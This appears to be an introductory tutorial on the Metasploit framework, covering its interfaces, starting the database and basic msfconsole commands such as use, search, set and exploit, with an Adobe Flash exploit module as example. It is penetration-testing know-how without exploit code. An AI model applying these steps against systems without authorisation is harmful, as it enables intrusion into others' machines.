The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Metasploit is the world’s leading exploitation framework. It is used, to some extent, by nearly every hacker/pentester. As such, you really need to become familiar with it if you want to enter and prosper in this burgeoning field.
Metasploit has multiple interfaces including;
(1) msfconsole – an interactive command-line like interface
(2) msfcli – a literal Linux command line interface
(3) Armitage – a GUI-based third party application
(4) msfweb – browser based interface
Before we start Metasploit, we should start the postgresql database. Metasploit will work without postgresql, but this database enables Metasploit to run faster searches and store the information you collect while scanning and exploiting.
Start the postgresql database before starting Metasploit by typing;
kali > service postgresql start
Once the database has been started, you can start the Metasploit Framework console by typing;
Although Metasploit is a very powerful exploitation framework, just a few keywords can get you started hacking just about any system.
Metasploit has six (6) types of modules;
A word about terminology though before we start. In Metasploit terminology, an exploit is a module that takes advantage of a system or application vulnerability. It usually will attempt to place a payload on the system. This payload can be a simple command shell or the all-powerful Meterpreter. In other environments, these payloads might be termed listeners or rootkits. I will do a tutorial on each of these types of modules in the near future.
Let’s take a look at some of those keyword commands. We can get a list of commands by typing help.
msf > help
msf > use
The “use” command loads a module. So, for instance, if I wanted to load the exploit/windows/browser/adobe_flash_avm2 module (this is an exploit that takes advantage of one of the many vulnerabilities in the Adobe Flash plug-in), I would type;
msf > use exploit/windows/browser/adobe_flash_avm2
msf > search
As a newcomer to Metasploit, the “search” command might be the most useful. When Metasploit was small and new, it was relatively easy to find the right module you needed. Now, with over 3000 modules, finding just the right module can be time-consuming and problematic. Rapid7 added the search function starting with version 4 and it has become a time- and life-saver.
Although you can use the search function to search for keywords, that approach is not always efficient as it will often return a VERY large result set.
To be more specific in your search, you can use the following keywords.
platform – this is the operating system that the module is built for.
type – this is the type of module. These include exploits, nops, payloads, post, encoders and auxiliary
name – if you know the name of the module you can search by its name
The syntax for using search is the keyword followed by a colon and then a value such as;
msf > search type:exploit
For instance, if you were looking for an exploit (type) for Windows (platform) for Abobe Flash, we could type;
msf > search type:exploit platform:windows flash
msf > set
This command is use to set options within the module you selected. For instance, if we look above at the show options command, we can see numerous options that must set such as URIPATH, SVRHOST and SVRPORT. We can set any of these with the set command such as;
msf > set SRVPORT 80
This changes the default SVRPORT (server port) from 8080 to 80.
msf > unset
This command, as you might expect, unsets the option that was previously set. Such as;
msf > unset SRVPORT
msf > exploit
Once we have loaded our exploit and set all the necessary options, the final action is “exploit”. This sends the exploit to the target system and, if successful, installs the payload.